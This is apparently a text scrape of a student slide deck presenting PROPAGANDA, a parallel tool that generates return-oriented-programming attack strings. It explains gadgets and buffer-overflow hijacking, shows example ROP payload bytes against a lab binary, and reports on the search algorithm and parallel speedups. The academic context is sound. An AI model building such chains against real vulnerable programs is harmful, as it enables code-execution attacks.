PROPAGANDA Parallel ROP Attack Generator and Non-Direct Assembler - - PowerPoint PPT Presentation

propaganda
SMART_READER_LITE
LIVE PREVIEW

PROPAGANDA Parallel ROP Attack Generator and Non-Direct Assembler - - PowerPoint PPT Presentation

PROPAGANDA Parallel ROP Attack Generator and Non-Direct Assembler Chris Lee and Ben Spinelli A return-oriented programming (ROP) attack takes advantage of buffer overflow vulnerabilities in executables to gain control of the program. Stack


slide-1
SLIDE 1

PROPAGANDA

Parallel ROP Attack Generator and Non-Direct Assembler

Chris Lee and Ben Spinelli

slide-2
SLIDE 2

A return-oriented programming (ROP) attack takes advantage of buffer overflow vulnerabilities in executables to gain control of the program.

... buf ... ret ... Stack

00 00 00 00 &G1 &G2 ...

Attack String

Padding (fills buffer)

Because programs are just sequences of bytes, you could directly input byte code in old school attacks.

Your addresses clobber the return address

BUT, people fixed this, so now we use GADGETS!

slide-3
SLIDE 3

Gadgets are sequences of bytes within the vulnerable executable that are terminated by 0xc3 (return).

After returning, the program goes to the next return address and continues executing.

402e74: 41 5f pop %r15 402e76: c3 retq

5f c3 performs pop %rdi (register used for first argument). So, we just have to create a string like this:

/* pop %rdi */ 75 2e 40 00 00 00 00 00 /* stack constant $0xffff */ ff ff 00 00 00 00 00 00 /* address of withdraw_money */ 23 1e 60 00 00 00 00 00

PROFIT!

slide-4
SLIDE 4

We grow a tree by applying the given rules and creating variables (t). A node can be:

  • matched with a gadget: becomes a solved leaf.
  • matched with a rule: creates more nodes and solves them.

We do this until every endpoint is a solved leaf.

Equivalence rules:

S  t t  D S  D S + $0x0  D S  D t  D

We created a parallel ROP attack generator.

We perform parallel search based on a sequence of desired effects (target) and equivalence rules. Both are provided by the user.

slide-5
SLIDE 5

This is the result of a completed search.

%rdi + %rsi  %rax %rax  %rdi %rcx  %rsi t2 + t5  t6 t6  %rdi %rdx  %rcx t4  t5 t2 + t5  %rdi %rax  %rdx t3  t4 t2 + t4  %rdi pop %rax ($0x1337) %rax  %rdx t1  t3 t2 + t3  %rdi %rsp  %rax pop t1 ($0x1337) t0  t2 t2 + t1  %rdi %rsp  t0 $0x1337  t1 t0 + t1  %rdi %rsp + $0x1337  %rdi

Target:

%rsp + $0x1337  %rdi

Gadgets:

%rsp  %rax (0x401c4f) %rcx  %rsi (0x401c2f) %rax  %rdx (0x401c0f) %rdx  %rcx (0x401c08) %rcx  %rdx (0x401bb8) %rdi + %rsi  %rax (0x401b98) pop %rax (0x401b98) %rax  %rdi (0x401b6c)

Complete Tree (grows upwards): Attack String:

/* Pad with buffer size */ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 /* Mov %rax, %rsp */ 4f 1c 40 00 00 00 00 00 /* Mov %rdi, %rax */ 6c 1b 40 00 00 00 00 00 /* Load %rax, $0x1337 */ 8d 1b 40 00 00 00 00 00 /* Stack constant 0x1337 */ 37 13 00 00 00 00 00 00

/* Mov %rdx, %rax */ 0f 1c 40 00 00 00 00 00 /* Mov %rcx, %rdx */ 08 1c 40 00 00 00 00 00 /* Mov %rsi, %rcx */ 2f 1c 40 00 00 00 00 00 /* Arith %rax, %rdi+%rsi */ 98 1b 40 00 00 00 00 00 /* Call target function */ 01 23 45 67 89 ab cd ef

slide-6
SLIDE 6

Our algorithm was difficult to implement because of domain-imposed constraints:

  • 1. Preventing Infinite looping
  • How do we prevent a cycle of applied rules?
  • 2. Synchronizing Variables
  • When a variable gets a value, how do we update that value across

all branches that have it?

  • And then back track if that value fails?
  • 3. Serializing gadgets
  • All instructions share a small number of registers.
  • How do we prevent them from clobbering each other’s resources?

We solved these problems. Check our writeup for details. :D

slide-7
SLIDE 7

We parallelized our algorithm by distributing work before the search occurs.

We wanted to minimize synchronization between threads. Original Target Chunk 0 Chunk 1 Chunk 2 Chunk 3

Running on 2 threads

T0 T1 Chunk 2 Chunk 3 Global Work Queue Cost of synchronization > Benefit of fine-grained work distribution We did implement parallelism with much finer-grained work distribution, but….

slide-8
SLIDE 8

Speedup is limited by attack target size.

Typical targets aren’t heavily imbalanced, so our work distribution is OK.

Small target Medium target Large target Run on 6-core GHC Machine [GHC38]

slide-9
SLIDE 9

Workload imbalance is the main barrier to parallelism.

We have to assign nodes to threads before knowing how much each node will need.

Run on 6-core GHC Machine [GHC38]

slide-10
SLIDE 10

All branches failed at around the same time

Short-circuiting on failure can result in super-linear speedup.

Note: In this case, we get a 50x speedup, but this just depends on the disparity of the branch sizes.

One branch fails earlier

Run on 6-core GHC Machine [GHC38]

slide-11
SLIDE 11

LIVE DEMO!!!! ✧۹(•́⌄•́๑)و✧